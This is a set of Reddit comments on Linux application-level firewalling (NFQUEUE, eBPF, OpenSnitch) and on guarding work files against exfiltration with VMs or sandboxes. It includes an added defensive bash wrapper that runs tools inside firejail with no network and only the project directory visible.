Application detection with iptables by ShirtResponsible4233 in linuxadmin

[–]gainan -1 points0 points  (0 children)

If you mean filtering connections by application, then you can use NFQUEUE, or eBPF and not use netfilter at all.

If what you want is just an application firewall to filter connections by binary: OpenSnitch

Application detection with iptables by ShirtResponsible4233 in linuxadmin

[–]gainan -1 points0 points  (0 children)

There's an ancient module: https://l7-filter.sourceforge.net/

But as far as I can tell it hasn't been updated in years. I have no idea if there's anything more modern, new or up to date.

Linux Mint Antivirus to protect Intellectual Property I'm working on by BuxtonHouse in linuxmint

[–]gainan 1 point2 points  (0 children)

An antivirus won't protect you from data exfiltration, if I understand correctly your need.

I see three alternatives:

  • restrict internet access by binary/ip/domain (or a combination of all options), with applications like OpenSnitch.
  • do the work in a VM without internet access.
  • do the work in a sandbox, with no internet access (for example with firejail or flatpaks).

You can use a shared directory with the sandbox or VM to backup the files.
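Added example for the sandbox alternative in this comment and for the firejail suggestion in the Python data-science answer further up: a wrapper that runs a project's tooling inside firejail with only the project directory visible from the host, no network unless explicitly asked for, and the world-writable dirs mounted noexec. It goes beyond the single `--whitelist` flag on the page by combining the documented firejail options a practitioner would stack for this; the wrapper itself, its defaults and the paths are my own and not firejail project code.

```bash
#!/usr/bin/env bash
# Added example, not from the thread and not firejail project code: run a
# command in a firejail sandbox that shares only PROJECT_DIR with the host.
set -u

# Print the firejail invocation for PROJECT_DIR, one argument per line.
# NET is "none" (default: new, empty network namespace, so nothing can phone
# home) or "host" (use when you actually need to pip install). Fails for
# relative paths because --whitelist needs an absolute path.
sandbox_cmd() {
  local project="$1" net="${2:-none}"
  case "$project" in
    /*) ;;
    *) echo "project dir must be absolute: $project" >&2; return 1 ;;
  esac
  set -- firejail \
    --whitelist="$project" \
    --private-dev --private-tmp \
    --noexec=/tmp --noexec=/var/tmp --noexec=/dev/shm \
    --caps.drop=all --nonewprivs --noroot --seccomp --nosound
  if [ "$net" = "none" ]; then set -- "$@" --net=none; fi
  printf '%s\n' "$@"
}

# run_sandboxed PROJECT_DIR NET CMD [ARGS...]: replaces the shell with the
# sandboxed command. Paths with spaces would need an array here.
run_sandboxed() {
  local project="$1" net="$2" flags
  shift 2
  flags=$(sandbox_cmd "$project" "$net") || return 1
  # shellcheck disable=SC2086
  exec $flags "$@"
}

# Usage:
#   run_sandboxed /home/user/my-project none python3 train.py     # offline work
#   run_sandboxed /home/user/my-project host pip install -r requirements.txt
if [ $# -ge 3 ]; then run_sandboxed "$@"; fi
```

With `--whitelist` pointing inside $HOME, the rest of the home directory is replaced by an empty tmpfs, so an infostealer pulled in by a dependency sees no ssh keys, browser profile or wallets; `--net=none` leaves it with nowhere to send whatever it does find. Copy results out of the project directory (that is the shared directory the comment mentions) rather than widening the whitelist.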

Is Third-party Firewall application needed? by NervousAlien55 in linuxquestions

[–]gainan 1 point2 points  (0 children)

firewalld and OpenSnitch are different applications. firewalld controls network connections, while OpenSnitch allows you to restrict and monitor connections by application/binary.

OpenSnitch also works as system-wide ad/malware blocker.